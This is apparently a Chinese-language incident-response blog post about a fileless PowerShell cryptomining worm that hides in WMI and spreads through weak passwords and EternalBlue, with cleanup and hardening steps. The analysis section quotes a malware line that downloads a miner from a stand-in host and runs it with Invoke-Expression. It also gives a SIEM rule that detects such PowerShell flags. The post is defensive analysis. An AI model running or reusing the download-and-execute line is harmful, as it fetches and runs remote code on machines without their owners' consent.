剖析Powershell挖矿病毒：从WMI驻留到永恒之蓝横向移动的攻防实战

1. 初识Powershell挖矿病毒当服务器CPU突然飙高时那天早上刚到公司运维同事小李就急匆匆跑过来张哥咱们三台Web服务器CPU直接冲到100%了用户投诉页面卡成PPT我连咖啡都没来得及喝就冲进机房打开任务管理器一看——好家伙十几个Powershell.exe进程把CPU资源吃得干干净净。这场景太经典了基本可以确定是遇到了Powershell挖矿病毒。这种病毒最近在企业网里特别猖獗它最恶心的地方在于采用了无文件攻击技术。传统病毒好歹能在硬盘上找到.exe文件而这个家伙直接把恶意代码塞进WMIWindows管理规范的数据库里。每次开机系统都会自动从WMI里加载并执行这些加密的恶意脚本就像有个隐形人天天往你电脑里塞小纸条。更麻烦的是它的双重传播机制一方面通过WMIExec爆破弱密码另一方面利用永恒之蓝漏洞MS17-010在局域网里自动扩散。我见过最夸张的案例某公司财务部一台电脑中招两小时后整个楼层的服务器全部沦陷。病毒作者显然深谙不要把鸡蛋放在一个篮子里的道理给病毒上了双保险。2. 病毒解剖课WMI里的暗箱操作2.1 WMI成了病毒的温床用wbemtest工具连接root\Default命名空间时我发现了病毒创建的恶意类。早期版本会伪装成Win32_Services后来变种改成了System_Anti_Virus_Core这种极具迷惑性的名字——这就像小偷在自家门口挂了个公安局的牌子。双击打开这个类里面是经过Base64编码的Powershell脚本。用在线解码工具还原后能看到典型的挖矿代码特征$miner New-Object Net.WebClient $miner.DownloadString(http://malicious.site/xmrig) | Invoke-Expression这段代码会从攻击者控制的服务器下载门罗币挖矿程序然后直接在内存中运行根本不会在磁盘留下可执行文件。2.2 病毒的自保机制病毒在本地安全策略里创建IPSec规则这个操作特别鸡贼。它会封堵本机的445端口看似在防护永恒之蓝漏洞实际是为了阻止其他病毒来抢地盘——就像黑帮划地盘时在边界拉警戒线。通过这条命令可以查看被篡改的策略netsh ipsec static show all3. 实战清除与病毒的近身肉搏3.1 紧急止血措施首先得用雷霆手段结束Powershell进程否则服务器根本动不了。但直接点结束进程是没用的病毒设置了守护机制。我习惯用组合拳taskkill /f /im powershell.exe wmic process where namepowershell.exe delete注意这只能争取1-2小时的操作时间就像给大出血的病人扎止血带必须抓紧时间做后续处理。3.2 挖出WMI里的定时炸弹清理WMI需要特别小心就像拆弹时剪错电线会引发二次爆炸。正确的操作流程是打开wbemtest连接root\Default右键可疑类选择删除用命令行彻底清理残留wmic /namespace:\\root\default path __EventFilter delete wmic /namespace:\\root\default path CommandLineEventConsumer delete4. 防御体系建设让病毒无处可藏4.1 系统加固三板斧第一招是关闭WMI的远程执行功能就像给后门上锁reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRM\Service /v WinRMCompatibility /t REG_DWORD /d 0 /f第二招必须打上MS17-010补丁我见过太多企业因为觉得内网很安全而吃大亏。第三招是在防火墙上设置445端口的访问控制这是阻断病毒横向移动的关键。4.2 高级狩猎技巧在SIEM系统里设置这个检测规则特别有效SELECT * FROM WinEvent WHERE EventID4688 AND (CommandLine LIKE % -nop -w hidden -c % OR CommandLine LIKE %EncodedCommand%)这个规则专门抓Powershell的典型恶意参数组合去年帮我们提前发现了三起入侵事件。5. 血的教训那些年我们踩过的坑有次给某制造业客户做应急响应发现他们所有服务器都中了挖矿病毒。排查发现是运维在用的一台跳板机密码是Admin123被病毒用WMIExec轻松爆破。更离谱的是他们的域控制器居然没打永恒之蓝补丁导致病毒像野火般蔓延。后来我们做了个实验在内网放了一台没打补丁的Win7电脑2分17秒后就被攻陷。这个数据现在成了我给客户做安全培训时的必讲案例——攻击者的速度永远比你想象得快。现在每次给企业做安全评估我第一件事就是检查WMI和SMB配置。安全运维就像刷牙不能等到牙疼才想起要做。那些觉得我们数据不值钱不会被盯上的企业最后都成了攻击者的免费矿场。